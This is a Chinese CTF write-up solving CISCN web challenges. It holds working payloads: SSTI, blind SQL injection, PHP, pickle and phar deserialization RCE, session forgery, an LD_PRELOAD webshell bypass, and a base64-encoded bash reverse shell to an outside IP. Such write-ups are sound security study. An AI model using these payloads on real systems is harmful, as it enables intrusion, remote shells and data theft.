【Web】纯萌新的CISCN刷题记录(1)

目录

[[CISCN 2019华东南]Web11](#[CISCN 2019华东南]Web11)

[[CISCN 2019华北Day2]Web1](#[CISCN 2019华北Day2]Web1)

[[CISCN 2019初赛]Love Math](#[CISCN 2019初赛]Love Math)

[[CISCN 2022 初赛]ezpop](#[CISCN 2022 初赛]ezpop)

[[CISCN 2019华东南]Double Secret](#[CISCN 2019华东南]Double Secret)

[[CISCN 2023 华北]ez_date](#[CISCN 2023 华北]ez_date)

[[CISCN 2019华北Day1]Web1](#[CISCN 2019华北Day1]Web1)

[[CISCN 2019华东南]Web4](#[CISCN 2019华东南]Web4)

[[CISCN 2019华北Day1]Web2](#[CISCN 2019华北Day1]Web2)

[[CISCN 2023 西南]do_you_like_read](#[CISCN 2023 西南]do_you_like_read)

[[CISCN 2023 华北]pysym](#[CISCN 2023 华北]pysym)

[[CISCN 2023 初赛]DeserBug](#[CISCN 2023 初赛]DeserBug)

---

主打一个精简

[CISCN 2019华东南]Web11

XFF处有Smarty模板注入

payload:

X-Forwarded-For: {if system('tac /flag')}{/if}

[CISCN 2019华北Day2]Web1

if(1=1,sleep(5),1) 测出可以时间盲注

脚本

import requests

url = 'http://node4.anna.nssctf.cn:28396/index.php'
res = ""

for i in range(1, 48, 1):
    for j in range(32, 128, 1):
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{j},sleep(0.5),0)#'
        # payload = f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{j},sleep(0.5),0)#"
        payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{j},sleep(1),0)"
        data = {
            'id': payload
        }
        try:
            r = requests.post(url=url, data=data,timeout=0.5)
        except Exception as e:
            continue

        res += chr(j)
        print(res)
        break

[CISCN 2019初赛]Love Math

这个waf只要不是纯数字，就会被认为是函数丢给白名单检测

目标构造

?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag

\]可以用{}来替代 _GET=hex2bin(5f474554) 5f474554因为含一个f，所以要如下构造 5f474554=dechex(1598506324) hex2bin可以用36进制来构造(从0-x共35个字符，用36进制) base_convert()函数将10进制数转化为36进制的hex2bin  `hex2bin`=`base_convert(37907361743,10,36)` payload: ?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag  ## \[CISCN 2022 初赛\]ezpop 参考文章：[ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户](https://www.freebuf.com/vuls/321546.html "ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户") 访问/www.zip拿到源码 找到反序列化入口为/index.php/index/index  exp lazySave = True; $this->data = ['whoami' => ['cat /nssctfflag']]; $this->exists = True; $this->table = $obj; $this->withAttr = ['whoami' => ['system']]; $this->json = ['whoami',['whoami']]; $this->jsonAssoc = True; } } } namespace think\model{ use think\Model; class Pivot extends Model{ } }  ## \[CISCN 2019华东南\]Double Secret  访问/robots.txt  访问/secret，让传参secret  随便传参报错，点开标记点 RC4解密，密钥是"HereIsTreasure"，可以利用flask的模板注入，执行命令，只不过先需要进行RC4加密。 RC4加密脚本 import base64 from urllib import parse def rc4_main(key="init_key", message="init_message"): # 返回加密后得内容 s_box = rc4_init_sbox(key) crypt = str(rc4_excrypt(message, s_box)) return crypt def rc4_init_sbox(key): s_box = list(range(256)) j = 0 for i in range(256): j = (j + s_box[i] + ord(key[i % len(key)])) % 256 s_box[i], s_box[j] = s_box[j], s_box[i] return s_box def rc4_excrypt(plain, box): res = [] i = j = 0 for s in plain: i = (i + 1) % 256 j = (j + box[i]) % 256 box[i], box[j] = box[j], box[i] t = (box[i] + box[j]) % 256 k = box[t] res.append(chr(ord(s) ^ k)) cipher = "".join(res) return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8')) key = "HereIsTreasure" # 此处为密文 message = input("请输入明文:\n") enc_base64 = rc4_main(key, message) enc_init = str(base64.b64decode(enc_base64), 'utf-8') enc_url = parse.quote(enc_init) print("rc4加密后的url编码:" + enc_url) # print("rc4加密后的base64编码"+enc_base64) 注入payload: {{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}   ## \[CISCN 2023 华北\]ez_date  关于md5和sha1强相等 a=1; $a->b='1'; $a->file='/f\l\a\g'; echo base64_encode(serialize($a)); ?> payload: ?code=Tzo0OiJkYXRlIjozOntzOjE6ImEiO2k6MTtzOjE6ImIiO3M6MToiMSI7czo0OiJmaWxlIjtzOjg6Ii9mXGxcYVxnIjt9 ##  ## \[CISCN 2019华北Day1\]Web1  随便注册一个账号登录进去  在download.php可以下载各种文件源码进行审计 生成恶意phar包并改后缀上传 db = new FileList(); } } class File{ public $filename; } class FileList { private $files; public function __construct() { $file = new File(); $file->filename = '/flag.txt'; $this->files = array($file); } } $User = new User(); $phar = new Phar("exp.phar"); //生成phar文件 $phar->startBuffering(); $phar->setStub('GIF89a'.''); $phar->setMetadata($User); //触发类 $phar->addFromString("text.txt", "test"); //签名 $phar->stopBuffering(); ?> 在delete.php抓包post传参，unlink触发phar反序列化 filename=phar://exp.png  ## \[CISCN 2019华东南\]Web4 抓包看响应头，是python框架  /read?url=/app/app.py 拿到源码 一眼session伪造 import re, random, uuid, urllib from flask import Flask, session, request app = Flask(__name__) random.seed(uuid.getnode()) app.config['SECRET_KEY'] = str(random.random()*233) app.debug = True @app.route('/') def index(): session['username'] = 'www-data' return 'Hello World! Read somethings' @app.route('/read') def read(): try: url = request.args.get('url') m = re.findall('^file.*', url, re.IGNORECASE) n = re.findall('flag', url, re.IGNORECASE) if m or n: return 'No Hack' res = urllib.urlopen(url) return res.read() except Exception as ex: print str(ex) return 'no response' @app.route('/flag') def flag(): if session and session['username'] == 'fuck': return open('/flag.txt').read() else: return 'Access denied' if __name__=='__main__': app.run( debug=True, host="0.0.0.0" ) 现有的session拿去jwt解密，内容base64解码就是www-data，我们只要找到secret-key就可了  python random生成的数是伪随机数，利用伪随机数的特性，只要种子是一样的，后面产生的随机数值也是一样的 uuid.getnode()，是网卡mac地址的十进制数，那我们就要知道网卡的mac地址，读取/sys/class/net/eth0/address  16进制转10进制：2485376933288 import random random.seed(2485376933288) randStr = str(random.random() * 233) print randStr  修改session拿到flag  ## \[CISCN 2019华北Day1\]Web2 题目要买到lv6的账号  脚本开爆 import requests import time for i in range(1,200): time.sleep(0.8) print(i) url = 'http://node4.anna.nssctf.cn:28867/shop?page={}'.format(i) r = requests.get(url) if 'lv6.png' in r.text: print("找到lv6-----{}".format(i)) break   购买需要账号 随便注册个账号，发现钱不够，买不起 但discount可以修改，回显/b1g_m4mber路由  访问显示要admin  垂直越权，爆jwt的secret_key  改username为admin，伪造jwt  拿着修改后的jwt访问/b1g_m4mber  右键查看源码拿到www.zip  关注Admin.py，可以打pickle反序列化 import tornado.web from sshop.base import BaseHandler import pickle import urllib class AdminHandler(BaseHandler): @tornado.web.authenticated def get(self, *args, **kwargs): if self.current_user == "admin": return self.render('form.html', res='This is Black Technology!', member=0) else: return self.render('no_ass.html') @tornado.web.authenticated def post(self, *args, **kwargs): try: become = self.get_argument('become') p = pickle.loads(urllib.unquote(become)) return self.render('form.html', res=p, member=1) except: return self.render('form.html', res='This is Black Technology!', member=0) python2环境下运行这段脚本 import pickle import urllib class test(object): def __reduce__(self): return (eval, ("open('/flag.txt', 'r').read()",)) a = test() s = pickle.dumps(a) print(urllib.quote(s))  ## \[CISCN 2023 西南\]do_you_like_read 拿到附件拖进Seay扫一下  注意到/bootstrap/test/bypass_disablefunc.php example: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so

"; $cmd = $_GET["cmd"]; $out_path = $_GET["outpath"]; $evil_cmdline = $cmd . " > " . $out_path . " 2>&1"; echo "

cmdline: " . $evil_cmdline . "

"; putenv("EVIL_CMDLINE=" . $evil_cmdline); $so_path = $_GET["sopath"]; putenv("LD_PRELOAD=" . $so_path); mail("", "", "", ""); echo "

output:
" . nl2br(file_get_contents($out_path)) . "

"; unlink($out_path); ?> 同目录下有可利用的so文件  payload: /bootstrap/test/bypass_disablefunc.php?cmd=env&outpath=/tmp/xx&sopath=/app/bootstrap/test/bypass_disablefunc_x64.so  ## \[CISCN 2023 华北\]pysym 题目提示无软链接  附件给到源码 from flask import Flask, render_template, request, send_from_directory import os import random import string app = Flask(__name__) app.config['UPLOAD_FOLDER']='uploads' @app.route('/', methods=['GET']) def index(): return render_template('index.html') @app.route('/',methods=['POST']) def POST(): if 'file' not in request.files: return 'No file uploaded.' file = request.files['file'] if file.content_length > 10240: return 'file too lager' path = ''.join(random.choices(string.hexdigits, k=16)) directory = os.path.join(app.config['UPLOAD_FOLDER'], path) os.makedirs(directory, mode=0o755, exist_ok=True) savepath=os.path.join(directory, file.filename) file.save(savepath) try: os.system('tar --absolute-names -xvf {} -C {}'.format(savepath,directory)) except: return 'something wrong in extracting' links = [] for root, dirs, files in os.walk(directory): for name in files: extractedfile =os.path.join(root, name) if os.path.islink(extractedfile): os.remove(extractedfile) return 'no symlink' if os.path.isdir(path) : return 'no directory' links.append(extractedfile) return render_template('index.html',links=links) @app.route("/uploads/",methods=['GET']) def download(path): filepath = os.path.join(app.config['UPLOAD_FOLDER'], path) if not os.path.isfile(filepath): return '404', 404 return send_from_directory(app.config['UPLOAD_FOLDER'], path) if __name__ == '__main__': app.run(host='0.0.0.0',port=1337) 对文件名无过滤，可以直接命令拼接 payload: exp.tar;echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjEn | base64 -d | bash;  成功反弹shell，拿到flag  ## \[CISCN 2023 初赛\]DeserBug [【Web】记录CISCN2023国赛初赛DeserBug题目复现_deserbug ctf-CSDN博客](https://z3r4y.blog.csdn.net/article/details/136748656 "【Web】记录CISCN2023国赛初赛DeserBug题目复现_deserbug ctf-CSDN博客")